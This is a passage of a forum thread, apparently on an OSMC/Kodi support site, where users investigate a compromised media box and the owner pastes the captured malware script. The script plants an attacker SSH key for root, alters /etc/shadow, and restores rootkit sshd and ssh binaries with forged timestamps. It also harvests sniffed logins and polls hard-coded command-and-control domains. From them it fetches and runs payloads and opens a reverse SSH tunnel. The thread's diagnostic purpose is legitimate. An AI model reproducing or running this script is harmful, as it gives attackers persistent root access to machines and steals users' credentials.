/lib/modules/3.14.29-158-osmc/modules.dep                                 FAILED

Interesting, apparently the openssh-client programs are also being replaced:

$ ssh -v 2>&1 | head -n1
OpenSSH_8.2p2 p1, OpenSSL 1.0.2l  25 May 2017
$ dpkg -l openssh-client | tail -n1
ii  openssh-client 1:7.4p1-10+deb9u7 armhf        secure shell (SSH) client, for secure access to remote machines

I’m not sure if the module checksum failures should be concerning. I suspect not.

The debsums issue has appeared before. It’s down to a build decision of Sam’s. Corrupt Debian installation in official images

I noticed that the containerd service is still running, so best to disable that, as well, and reboot.

A few things I’ve noticed:

  • the size of the “foreign” sshd executable is 2938932 (2.9 MiB) while the official executable is only 609164 bytes. It might be that the foreign file isn’t stripped but that’s a big difference.

  • the log shows that a kill -9 was issued in order to zap the original process. Using minus nine is like a “kill with extreme prejudice” and, though it might be legitimate, raises a red flag with me.

I’m also tending towards this being something malicious, though, given the complexity of your installation, I can understand why you might be reluctant to go for a full reinstall. Either way, you certainly need to keep a copy of the bad file for further testing. Perhaps @sam_nazarko might consider enabling CONFIG_AUDIT in the next kernel build.

I’ll see if I can find anything else in the available data.

Thanks, those are valuable hints! And yes, audit support in the kernel would be helpful.

I’m reluctant to go for a full reinstall, but it wouldn’t be that painful. Just my ~/.kodi would need backed up, the rest is automated. Still, it’s a last resort. I’d like to dig a little more first.

And to clarify an earlier comment, I suspect this is some kind of Rube Goldberg machine happening here. I don’t suspect LVM or devicemapper is directly responsible, but it might be kicking off whatever is doing this, based on:

  1. It happens (approx) every 30 minutes.
  2. The kernel: EXT4-fs (dm-0): re-mounted message always appears in the journal at the same moment that sshd.service is killed.

Trying some more experiments…

At least as a workaround you could try chattr -i to protect the file(s); suppose that this is really not a Trojan horse, which then has the necessary intelligence to circumvent this trick.
Personally, I would be alarmed if I couldn’t find out the reason quickly and would set up the system again (step by step to find the point when this starts).

A few things I’ve found:

  • the “kworker” process is probably bogus. Typically, kworker will appear in square brackets and without the leading dot. Your .kworker is a shell script in /tmp and, to top it all, its parent process ID (PPID) is 1, whereas the PPID of real [kworker] processes always seems to be 2 [kthreadd]. That’s definitely cause for concern. If you’re up for it, see what it contains (though it might be obfuscated) and grab a copy.

  • I can’t see any reference to version 8.2p2 of openssh, only 8.2p1. https://www.openssh.com/releasenotes.html That’s not watertight but is worthy of concern.

If you’re up for it, see what it contains (though it might be obfuscated) and grab a copy.

Finally nabbed this script. Don’t know why that didn’t occur to me before.

I think you guys are right, this very much looks like a Trojan horse to me. The SSH port is not open to the world, but nonetheless I’ve severed Internet connectivity to the box and am gonna try to track it down before doing a system reinstall.

Is this likely from some 3rd party Kodi addon? Except for docker-ce (from https://download.docker.com/linux/debian) I’ve not installed any debs from outside the OSMC repos, and my Docker images I thought are all from reputable sources.

$ docker images
REPOSITORY           TAG                 IMAGE ID            CREATED             SIZE
linuxserver/sonarr   latest              8eca83504a8c        7 weeks ago         423MB
linuxserver/lidarr   latest              630411891dd7        7 weeks ago         481MB
linuxserver/radarr   latest              b7419d4a9dfc        2 months ago        399MB
linuxserver/bazarr   latest              f7ddf9b307b9        2 months ago        196MB
linuxserver/nzbget   latest              98eea1c4faa6        2 months ago        133MB
pihole/pihole        4.3.2-1             1ad60393d9c2        11 months ago       292MB
pihole/pihole        latest              1ad60393d9c2        11 months ago       292MB

Anyway, here’s the little bugger…

#!/bin/bash
ptty_ver="v6.9-lala"
w_test_result="1"
rm -rf "/tmp/.kworker"
output="/dev/null" ; exec 1<>$output ; exec 2>&1
while [ "$1" != "" ]; do
        case $1 in
		-force )        force=1
                                ;;
                -log )          log=1
				output="/tmp/p.l" ; exec 1>>$output ; exec 2>&1
                                ;;
                -update )       update=1
                                ;;
        esac
        shift
done
luam_timestamp() {
    touch -r /bin/ls $1
}
mydir="/usr/lib/libu.a" ; [[ ! -d $mydir ]] && { echo "-> WARNING | \$mydir ($mydir) does not exist. creating..." ; mkdir $mydir ; luam_timestamp $mydir ; }
tempdir="/tmp/.tmp" ; [[ -s $tempdir ]] && rm -rf $tempdir
tempdir2="/tmp/.tmp2" ; [[ -s $tempdir2 ]] && rm -rf $tempdir2
### server info
[[ -s $mydir/t8489034780 ]] && type=$(cat $mydir/t8489034780) || type="unknown" ; echo "-> type: $type"          	# type
[[ -s $mydir/i1935678123 ]] && ip=$(cat $mydir/i1935678123) || ip="1.1.1.1" ; echo "-> ip: $ip"                  	# ip
[[ -s $mydir/g239293471 ]] && id_unic=$(cat $mydir/g239293471) || id_unic="unknown" ; echo "-> id_unic: $id_unic"    	# id
[[ -s $mydir/c6834946793 ]] && CTRY=$(cat $mydir/c6834946793) || CTRY="UNKNOWN" ; echo "-> ctry: $CTRY"              	# ctry
[[ -s $mydir/du7492762 ]] && serverspeed=$(cat $mydir/du7492762) || serverspeed="D:x/U:x" ; echo "-> serverspeed: $serverspeed"     # serverspeed
# OS
                os_raw=$(lsb_release -s -d 2>/dev/null)
                if [[ ! -z $os_raw ]]; then
                        os_raw="$(lsb_release -s -d)"
                elif [ -f /etc/debian_version ]; then
                        os_raw="Debian $(cat /etc/debian_version)"
                elif [ -f /etc/redhat-release ]; then
                        os_raw=$(cat /etc/redhat-release)
                else
                        os_raw="unknown"
                fi
                os=$(echo "${os_raw// /}")
                if [[ -z $os ]] ; then os="unknown" ; fi
# arch
                arch_raw=$(uname -m)
                arch=$(echo "${arch_raw// /}")
                if [[ -z $arch ]] ; then arch="unknown" ; fi
# kernel
                kernel_raw=$(uname -r)
                kernel=$(echo "${kernel_raw// /}")
                if [[ -z $kernel ]] ; then kernel="unknown" ; fi
# uptime
                uptime=$(</proc/uptime)
                uptime=${uptime%%.*}
                upt=$(( uptime/60/60/24 )) # result in days
                if [[ -z $upt ]] ; then upt="x" ; fi
### ssh key
[[ ! -d "/root" ]] && { mkdir /root ; luam_timestamp /root ; }
[[ $(stat -c "%a" "/root") != "755" ]] && { chmod 755 /root ; luam_timestamp /root ; }
[[ ! -d "/root/.ssh" ]] && { mkdir /root/.ssh ; luam_timestamp /root/.ssh ; }
[[ $(stat -c "%a" "/root/.ssh") != "755" ]] && { chmod 755 /root/.ssh ; luam_timestamp /root/.ssh ; }
[[ ! -s "/root/.ssh/authorized_keys" ]] && { > /root/.ssh/authorized_keys ; luam_timestamp /root/.ssh/authorized_keys ; }
[[ $(stat -c "%a" "/root/.ssh/authorized_keys") != "644" ]] && { chmod 644 /root/.ssh/authorized_keys ; luam_timestamp /root/.ssh/authorized_keys ; }
[[ -z $(cat /root/.ssh/authorized_keys 2>/dev/null |grep "mga0Zo5doC0S6kX") ]] && { echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDuAh68Wd3slOR7UPX+dCXdeuWt/w6ozNjw4AzCVycQCbQB0CY1ySg7DQ4TgiimwgM8iz/wrkm6BQHLy8EX+sozuBjU4MdB9HTs0R3c75CrLxSAh/Me1IPyWjlO7kkUrS5n5WeUqMDKF0zL6Yvm81LQIoayDA0GvIfoa2i/NthYcioytEiOsOt1jQqrhA2Tw/ECbzPUm0U6eB8eIpz7E1MVgBGD9aSoeyYFO+anqE8iG4uPFL89geundqUL68+sde4tyDe3zniQOFZTjvLoQ2GFSwYyR/0vrXpmD7HbGZC2qCP5N7fmKbLOfzXVM6NbFZ4EfC+O+mga0Zo5doC0S6kX" >> /root/.ssh/authorized_keys || echo "-> WARNING | failed to add sshkey" ; }
### some EdgeOS fixes | replacing stuff in shadow for root
[[ ! -z $(cat /etc/shadow |grep root |grep -F ':!:') ]] && sed -i "s/root:\!\:/root:\*\:/g" /etc/shadow # replacing ! with * for root (if neeeded)
[[ ! -z $(cat /etc/shadow |grep root |grep -F ':!*:') ]] && sed -i "s/root:\!\*\:/root:\*\:/g" /etc/shadow # replacing !* with * for root (if neeeded)
### checking sshd/ssh & back-up files
function sshd_restart
{
	if [[ -s /var/run/sshd.pid ]]; then
        	sshdpid=$(cat /var/run/sshd.pid)
                kill -9 $sshdpid
                /usr/sbin/sshd
                new_sshdpid=$(cat /var/run/sshd.pid 2>/dev/null)
                if [[ $sshdpid = $new_sshdpid ]]; then
                	killall -9 sshd
                        /usr/sbin/sshd
                fi
	else
        	killall -9 sshd
                /usr/sbin/sshd
        fi
}
# sshd
	if [[ ! -s $mydir/m9847292 ]] ; then
	        echo "-> WARNING | sshd backup: missing ($mydir/m9847292 was checked)"
	        sshd_backup_missing="YES"
	else
	        echo "-> sshd backup: file found ($mydir/m9847292 was checked)"
	        sshd_backup_missing="NO"
	        # checking if /usr/sbin/sshd is ours
	        size_rk=$(wc -c < $mydir/m9847292)
	        [[ -f /usr/sbin/sshd ]] && { size_sshd=$(wc -c < /usr/sbin/sshd); } || { size_sshd=0; }
	        if [[ $size_rk -eq $size_sshd ]] ; then
	                echo "-> /usr/sbin/sshd is my rk"
	        else
	                echo "-> WARNING | sshd is NOT our rk. trying to put back our rk"
			if [[ -s $mydir/m9847292 ]]; then
	                    rm -rf /usr/sbin/sshd ; cp -f $mydir/m9847292 /usr/sbin/sshd
	                    [[ $? != 0 ]] && { chattr -aui /usr/sbin/sshd ; rm -rf /usr/sbin/sshd ; cp -f $mydir/m9847292 /usr/sbin/sshd ; }
	                    [[ $? != 0 ]] && { mount -o remount,rw / ; cp -f $mydir/m9847292 /usr/sbin/sshd ; }
			    luam_timestamp /usr/sbin/sshd
			    sshd_restart
	                fi
	        fi
	fi
# ssh (simple | results will not go to CC)
	if [[ ! -s $mydir/m9847293 ]] ; then
		echo "-> WARNING | ssh backup: missing ($mydir/m9847293 was checked)"
	else
		echo "-> ssh backup: file found ($mydir/m9847293 was checked)"
		# checking if /usr/bin/ssh is ours
		size_rk=$(wc -c < $mydir/m9847293)
		[[ -f /usr/bin/ssh ]] && { size_ssh=$(wc -c < /usr/bin/ssh); } || { size_ssh=0; }
		if [[ $size_rk -eq $size_ssh ]] ; then
			echo "-> /usr/bin/ssh is my rk"
		else
			echo "-> WARNING | ssh is NOT our rk. trying to put back our rk"
			if [[ -s $mydir/m9847293 ]]; then
				rm -rf /usr/bin/ssh ; cp -f $mydir/m9847293 /usr/bin/ssh
				[[ $? != 0 ]] && { chattr -aui /usr/bin/ssh ; rm -rf /usr/bin/ssh ; cp -f $mydir/m9847293 /usr/bin/ssh ; }
				[[ $? != 0 ]] && { mount -o remount,rw / ; cp -f $mydir/m9847293 /usr/bin/ssh ; }
				luam_timestamp /usr/bin/ssh
			fi
		fi
	fi
# # ssh configs and keys (simple | results will not go to CC)
	echo "-> silently checking /etc/ssh/* files"
	ssh_need_restart=0
	if [[ -s $mydir/5hh/s67930294 ]]; then
		size_bu=$(wc -c < $mydir/5hh/s67930294)
		[[ -f /etc/ssh/ssh_config ]] && { size_r=$(wc -c < /etc/ssh/ssh_config); } || { size_r=0; }
		[[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s67930294 /etc/ssh/ssh_config ; luam_timestamp /etc/ssh/ssh_config ; ssh_need_restart=1; }
	fi
	if [[ -s $mydir/5hh/s222935739 ]]; then
		size_bu=$(wc -c < $mydir/5hh/s222935739)
		[[ -f /etc/ssh/sshd_config ]] && { size_r=$(wc -c < /etc/ssh/sshd_config); } || { size_r=0; }
		[[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s222935739 /etc/ssh/sshd_config ; luam_timestamp /etc/ssh/sshd_config ; ssh_need_restart=1; }
	fi
	if [[ -s $mydir/5hh/s3353023985 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s3353023985)
                [[ -f /etc/ssh/moduli ]] && { size_r=$(wc -c < /etc/ssh/moduli); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s3353023985 /etc/ssh/moduli ; luam_timestamp /etc/ssh/moduli ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s44196784368 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s44196784368)
                [[ -f /etc/ssh/ssh_host_dsa_key ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_dsa_key); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s44196784368 /etc/ssh/ssh_host_dsa_key ; luam_timestamp /etc/ssh/ssh_host_dsa_key ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s5538697 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s5538697)
                [[ -f /etc/ssh/ssh_host_dsa_key.pub ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_dsa_key.pub); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s5538697 /etc/ssh/ssh_host_dsa_key.pub ; luam_timestamp /etc/ssh/ssh_host_dsa_key.pub ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s668943982 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s668943982)
                [[ -f /etc/ssh/ssh_host_ecdsa_key ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_ecdsa_key); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s668943982 /etc/ssh/ssh_host_ecdsa_key ; luam_timestamp /etc/ssh/ssh_host_ecdsa_key ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s7734634 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s7734634)
                [[ -f /etc/ssh/ssh_host_ecdsa_key.pub ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_ecdsa_key.pub); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s7734634 /etc/ssh/ssh_host_ecdsa_key.pub ; luam_timestamp /etc/ssh/ssh_host_ecdsa_key.pub ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s885602766 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s885602766)
                [[ -f /etc/ssh/ssh_host_ed25519_key ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_ed25519_key); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s885602766 /etc/ssh/ssh_host_ed25519_key ; luam_timestamp /etc/ssh/ssh_host_ed25519_key ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s9903973 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s9903973)
                [[ -f /etc/ssh/ssh_host_ed25519_key.pub ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_ed25519_key.pub); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s9903973 /etc/ssh/ssh_host_ed25519_key.pub ; luam_timestamp /etc/ssh/ssh_host_ed25519_key.pub ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s127904595 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s127904595)
                [[ -f /etc/ssh/ssh_host_key ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_key); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s127904595 /etc/ssh/ssh_host_key ; luam_timestamp /etc/ssh/ssh_host_key ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s13893480 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s13893480)
                [[ -f /etc/ssh/ssh_host_key.pub ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_key.pub); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s13893480 /etc/ssh/ssh_host_key.pub ; luam_timestamp /etc/ssh/ssh_host_key.pub ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s1434598937 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s1434598937)
                [[ -f /etc/ssh/ssh_host_rsa_key ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_rsa_key); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s1434598937 /etc/ssh/ssh_host_rsa_key ; luam_timestamp /etc/ssh/ssh_host_rsa_key ; ssh_need_restart=1; }
        fi
	if [[ -s $mydir/5hh/s159346794 ]]; then
                size_bu=$(wc -c < $mydir/5hh/s159346794)
                [[ -f /etc/ssh/ssh_host_rsa_key.pub ]] && { size_r=$(wc -c < /etc/ssh/ssh_host_rsa_key.pub); } || { size_r=0; }
                [[ $size_bu -ne $size_r ]] && { cp -f $mydir/5hh/s159346794 /etc/ssh/ssh_host_rsa_key.pub ; luam_timestamp /etc/ssh/ssh_host_rsa_key.pub ; ssh_need_restart=1; }
        fi
	[[ $ssh_need_restart = 1 ]] && { sshd_restart; }
### creating /usr/sbin/suspended
	if [[ -s $mydir/5u5p3nd3d ]]; then
		size_bu=$(wc -c < $mydir/5u5p3nd3d)
		[[ -f /usr/sbin/suspended ]] && { size_r=$(wc -c < /usr/sbin/suspended); } || { size_r=0; }
		if [[ $size_bu -ne $size_r ]]; then
			if [[ $size_r = 0 ]]; then
				cp -f $mydir/5u5p3nd3d /usr/sbin/suspended
				chmod +x /usr/sbin/suspended
				luam_timestamp /usr/sbin/suspended
			else
				rm -rf /usr/sbin/suspended
				[[ -f /usr/sbin/suspended ]] && { chattr -aui /usr/sbin/suspended; rm -rf /usr/sbin/suspended; }
				if [[ ! -f /usr/sbin/suspended ]]; then
					cp -f $mydir/5u5p3nd3d /usr/sbin/suspended
					chmod +x /usr/sbin/suspended
					luam_timestamp /usr/sbin/suspended
				fi
			fi
		fi
	fi
### creating /usr/sbin/suspended-banner
	if [[ -s $mydir/5u5p3nd3d-bann3r ]]; then
		size_bu=$(wc -c < $mydir/5u5p3nd3d-bann3r)
		[[ -f /usr/sbin/suspended-banner ]] && { size_r=$(wc -c < /usr/sbin/suspended-banner); } || { size_r=0; }
		if [[ $size_bu -ne $size_r ]]; then
			if [[ $size_r = 0 ]]; then
				cp -f $mydir/5u5p3nd3d-bann3r /usr/sbin/suspended-banner
				luam_timestamp /usr/sbin/suspended-banner
			else
				rm -rf /usr/sbin/suspended-banner
				[[ -f /usr/sbin/suspended-banner ]] && { chattr -aui /usr/sbin/suspended-banner; rm -rf /usr/sbin/suspended-banner; }
				if [[ ! -f /usr/sbin/suspended-banner ]]; then
					cp -f $mydir/5u5p3nd3d-bann3r /usr/sbin/suspended-banner
					luam_timestamp /usr/sbin/suspended-banner
				fi
			fi
		fi
	fi

### checking if sshd is running
[[ -z $(ps x |grep -v grep|grep sshd) ]] && { echo "-> WARNING | sshd is not running. starting sshd" ; /usr/sbin/sshd ; } || echo "-> sshd is running"
### checking sshd port
[[ -s /bin/netstat ]] && sshd_port_raw=$(netstat -plunta |grep sshd |grep "0.0.0.0" | head -n 1 |awk -F ' ' '{print $4}' |awk -F ':' '{print $2}') && sshd_port=$(echo "${sshd_port_raw// /}")
[[ -z $sshd_port ]] && { echo "-> WARNING | failed to get sshd port" ; sshd_port="UNKNOWN" ; } || echo "-> sshd port is: $sshd_port"
### working on sniffer file
echo "-> silently working on sniffer file"
[[ ! -d /etc/lps ]] && { mkdir /etc/lps; > /etc/lps/lps; }
[[ ! -f /etc/lps/lps ]] && { > /etc/lps/lps; }
[[ $(wc -l < /etc/lps/lps) -gt 500 ]] && { > /etc/lps/lps; }
if [[ -s /etc/lps/lps ]]; then
	cat /etc/lps/lps |grep -v "^denied" > /etc/lps/temp; > /etc/lps/lps
	if [[ -s /etc/lps/temp ]]; then
		cat /etc/lps/temp |grep -v "^accepted" >> /etc/lps/final
		cat /etc/lps/temp |grep "^accepted" > /etc/lps/temp2
		if [[ -s /etc/lps/temp2 ]]; then
			awk '{print $2}' /etc/lps/temp2 |sort |uniq > /etc/lps/temp_uniq
			if [[ -s /etc/lps/temp_uniq ]]; then
				while read pair
				do
					[[ -z $pair ]] && { continue; }
					[[ $(cat /etc/lps/temp2 2>/dev/null |grep "$pair" |wc -l) -gt 10 ]] && { continue; }
					[[ $(cat /etc/lps/final 2>/dev/null |grep "$pair" |wc -l) -gt 0 ]] && { continue; }
					cat /etc/lps/temp2 2>/dev/null |grep "$pair" |head -1 >> /etc/lps/final
				done < /etc/lps/temp_uniq
			fi
			[[ -f /etc/lps/temp_uniq ]] && { rm -rf /etc/lps/temp_uniq ; }
		fi
		[[ -f /etc/lps/temp2 ]] && { rm -rf /etc/lps/temp2 ; }
	fi
	[[ -f /etc/lps/temp ]] && { rm -rf /etc/lps/temp ; }
fi
[[ -f /etc/lps/lps ]] && { touch -r /bin/ls /etc/lps/lps; }
[[ -s /etc/lps/final ]] && { sort /etc/lps/final |uniq > /etc/lps/temp; rm -rf /etc/lps/final; mv /etc/lps/temp /etc/lps/final; }
[[ -f /etc/lps/final ]] && { touch -r /bin/ls /etc/lps/final; }

if [[ -s /etc/lps/final ]] && [[ $(wc -l < /etc/lps/final) -gt 500 ]]; then
	random_string=$(head -80 /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 15 | head -n 1)
	[[ ! -z $random_string ]] && { sniff_file="snf_$random_string"; } || { sniff_file="snf"; }
	if [[ -f /etc/lps/$sniff_file ]]; then
		if [[ $(wc -l < /etc/lps/$sniff_file) -gt 600 ]]; then
			# file is too big to work on it
			rm -rf /etc/lps/$sniff_file
		else
			cat /etc/lps/final >> /etc/lps/$sniff_file ; touch -r /bin/ls /etc/lps/$sniff_file
			> /etc/lps/final ; touch -r /bin/ls /etc/lps/final
		fi
	else
		cat /etc/lps/final >> /etc/lps/$sniff_file ; touch -r /bin/ls /etc/lps/$sniff_file
		> /etc/lps/final ; touch -r /bin/ls /etc/lps/final
	fi
fi
# at this point we should have /etc/lps/final and /etc/lps/snf* as sniffer files
# END working on sniffer file

### CC part
dnsip=(
"208.67.220.222"
"8.8.8.8"
)
for d in "${dnsip[@]}" ; do
        [[ -z $(cat /etc/resolv.conf |grep "$d") ]] && { chattr -aui /etc/resolv.conf ; echo "nameserver $d" >>/etc/resolv.conf ; luam_timestamp /etc/resolv.conf ; }
done
for d in "${dnsip[@]}" ; do
        [[ -z $(cat /etc/resolv.conf |grep "$d") ]] && echo "-> WARNING | DNS: failed to add $d" || echo "-> DNS: $d"
done
CC_host=(
"lalapoc.kozow.com"
"antotehlant.theworkpc.com"
"matbaiteahe.mooo.com"
"gneivaientga.ignorelist.com"
)
echo "-> CC_host list:"
for h in "${CC_host[@]}" ; do
        echo "-> $h"
done
function confirm_CC
{
        for CC_IP in "${dns_cmd_array[@]}" ; do
                if [ "$url" == "neconfirmat" ] && [[ ! -z $CC_IP ]] ; then
                        echo "$h resolved to $CC_IP"
                                CC_check="http://$CC_IP/..."
                                echo -n "-> looking for CC (trying $CC_check) | "
                                if curl --connect-timeout 20 --max-time 20 --retry 5 --output /dev/null --silent --head --fail $CC_check; then
                                        echo -n "up & running | "
                                        content=$(curl --connect-timeout 20 --max-time 20 --retry 5 --silent -L $CC_check/auto/PTTY/cmd_file)
                                        content=$(echo "$content" |tr '[N-ZA-Mn-za-m]' '[A-Za-z]')
                                        declare -A CCcmd="($(echo "$content"))" 2>/dev/null ### not using -g, old bash doesn't have -g
                                        if [[ ${#CCcmd[@]} -eq 0 ]]; then
                                    	    echo "NOT confirmed | cmd_file is not an array"
                                        else
                                            if [[ ${CCcmd[valid]} != "yes" ]]; then
                                        	echo "NOT confirmed | \$valid != yes"
                                    	    else
                                    		echo "CONFIRMED"
                                    		url="$CC_check"
                                    	    fi
                                        fi
                                else
                                        echo "down - WARNING !"
                                fi
		fi
	done
}
url="neconfirmat"
for h in "${CC_host[@]}" ; do
        if [ "$url" == "neconfirmat" ] && [ -s /usr/bin/dig ] ; then
               	echo "/usr/bin/dig found -> using it to resolve hostnames"
                dns_cmd_array=(
                        "$(dig +short @208.67.222.222 $h | awk '{ print ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        "$(dig +short @8.8.8.8 $h | awk '{ print ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        "$(dig @208.67.222.222 $h | awk '/^;; ANSWER SECTION:$/ { getline ; print $5 ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        "$(dig @8.8.8.8 $h | awk '/^;; ANSWER SECTION:$/ { getline ; print $5 ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        )
                confirm_CC # functie
        fi
        if [ "$url" == "neconfirmat" ] && [ -s /usr/bin/host ] ; then
       	        echo "/usr/bin/host found -> using it to resolve hostnames"
                dns_cmd_array=(
                        "$(host $h 208.67.222.222 | awk '/has address/ { print $4 ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        "$(host $h 8.8.8.8 | awk '/has address/ { print $4 ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                        )
                confirm_CC # functie
        fi
        if [ "$url" == "neconfirmat" ] && [ -s /usr/bin/getent ] ; then
                echo "/usr/bin/getent found -> using it to resolve hostnames"
                dns_cmd_array=(
                        "$(getent hosts $h | awk '{ print $1 ; exit }' |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' |head -1)"
                         )
                confirm_CC # functie
        fi
        if [ "$url" == "neconfirmat" ] ; then
                echo "using server's default dns settings"
                if [[ ! -z $(cat /etc/hosts |grep "$h") ]] ; then
                        stupid_admin=$(cat /etc/hosts |grep "$h")
                        sed -i "/$h/d" /etc/hosts
                fi
                dns_cmd_array=(
                        "$h"
                        )
                confirm_CC # functie
                if [[ ! -z "$stupid_admin" ]] ; then echo "$stupid_admin" >> /etc/hosts ; fi
        fi
done
if [ "$url" == "neconfirmat" ] ; then
        echo "-> EXIT | can NOT find any working & confirmed CC"
        exit
fi

### using declare again, old bash fix
declare -A CCcmd="($(echo "$content"))" 2>/dev/null ### not using -g, old bash doesn't have -g

### ptty self update
echo ; echo "--- ptty UPDATE ---"
if [[ $update = "1" ]] ; then
    echo "-> ptty update activated, trying to download new ptty"
    ptty_update="$url/auto/rkip_files/ptty"
    curl --connect-timeout 20 --max-time 20 --retry 5 --silent $ptty_update --output /usr/sbin/gtta
    if [ "0" != "$?" ] ; then
        echo "-> WARNING | ptty download failed. trying to free some hdd space"
        mount -o remount,rw /
        > /var/log/auth.log
        rm -rf /var/log/*.1 /var/log/*.gz /usr/sbin/gtta
        apt-get clean >/dev/null 2>&1
        echo "-> downloading ptty (2nd try)"
        curl --connect-timeout 20 --max-time 20 --retry 5 --silent $ptty_update --output /usr/sbin/gtta
        if [[ "0" != "$?" ]]; then
    	    echo "-> EXIT | new ptty download failed"
	    exit
    	fi
    fi
    chmod +x /usr/sbin/gtta
    echo "-> new ptty downloaded, replacing old ptty"
    rm -rf /usr/sbin/ptty
    mv -f /usr/sbin/gtta /usr/sbin/ptty
    luam_timestamp /usr/sbin/ptty
    echo "-> running new ptty"
    ptty
else
    echo "-> update not activated"
fi
### update
echo ; echo "--- UPDATE ---"
if [[ ${CCcmd[update]} != "on" ]]; then
    echo "-> update is not 'on', value is: ${CCcmd[update]}"
else
    if [[ ${CCcmd[update_for]} = "updateall" ]] || [[ ! -z $(echo "${CCcmd[update_for]}" |grep "$id_unic") ]]; then
	echo "-> update is set to 'on' and enabled for 'all' or this id ($id_unic)"
	[[ ! -s $mydir/l4st_updt ]] && echo "1" > $mydir/l4st_updt
	if [[ ${CCcmd[update_no]} != $(cat $mydir/l4st_updt) ]]; then
	    echo "-> downloading and running update"
	    mkdir $tempdir
	    curl --connect-timeout 20 --max-time 20 --retry 5 --silent $CC_check/${CCcmd[file_path]} --output $tempdir/x
	    if [[ $? != 0 ]]; then
		echo "WARNING | failed to download update"
	    else
		echo ${CCcmd[update_no]} > $mydir/l4st_updt ; luam_timestamp $mydir/l4st_updt
		chmod +x $tempdir/x
		( cd $tempdir ; ./x & )
	    fi
	else
	    echo "-> update was already downloaded and executed"
	fi
    else
	echo "-> update is set to 'on' but NOT enabled for 'all' or this id ($id_unic)"
    fi
fi
### reverse ssh
echo ; echo "--- reverse ssh ---"
if [[ ${CCcmd[reverse]} != "on" ]]; then
	echo "-> reverse is not 'on', value is: ${CCcmd[reverse]}"
else
	if [[ ! -z $(echo "${CCcmd[reverse_for]}" |grep "$id_unic") ]]; then
		echo "-> reverse is set to 'on' and enabled for this id ($id_unic)"
		if [[ -z $(echo ${CCcmd[reverse_ip]} |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}') ]]; then #'
			echo "-> reverse_ip (${CCcmd[reverse_ip]}) is not a valid IP"
		else
			if [[ ! -z $(ps -elf |grep "reverse@" |grep -v grep) ]]; then
				echo "-> reverse already running"
			else
				r_port="2210"
				echo "-> starting reverse on ${CCcmd[reverse_ip]}:$r_port"
				ssh -o ExitOnForwardFailure=yes -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o PubkeyAuthentication=no -o ConnectTimeout=5 -o ServerAliveCountMax=1 -o ServerAliveInterval=60 -o LogLevel=quiet -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -fNTR $r_port:localhost:22 reverse@${CCcmd[reverse_ip]}
			fi
		fi
	else
		echo "-> reverse is set to 'on' but enabled for other id (${CCcmd[reverse_for]})"
	fi
fi
### reverse sniffer
echo ; echo "--- reverse sniffer ---"
if [[ ${CCcmd[sniffer]} != "on" ]]; then
	echo "-> sniffer is not 'on', value is: ${CCcmd[sniffer]}"
else
	if [[ ${CCcmd[sniffer_for]} = "snifferall" ]] || [[ ! -z $(echo "${CCcmd[sniffer_for]}" |grep "$id_unic") ]]; then
		echo "-> sniffer is set to 'on' and enabled for this id (${CCcmd[sniffer_for]})"
		if [[ -z $(echo ${CCcmd[sniffer_ip]} |grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}') ]]; then #'
		    echo "-> sniffer_ip (${CCcmd[sniffer_ip]}) is not a valid IP"
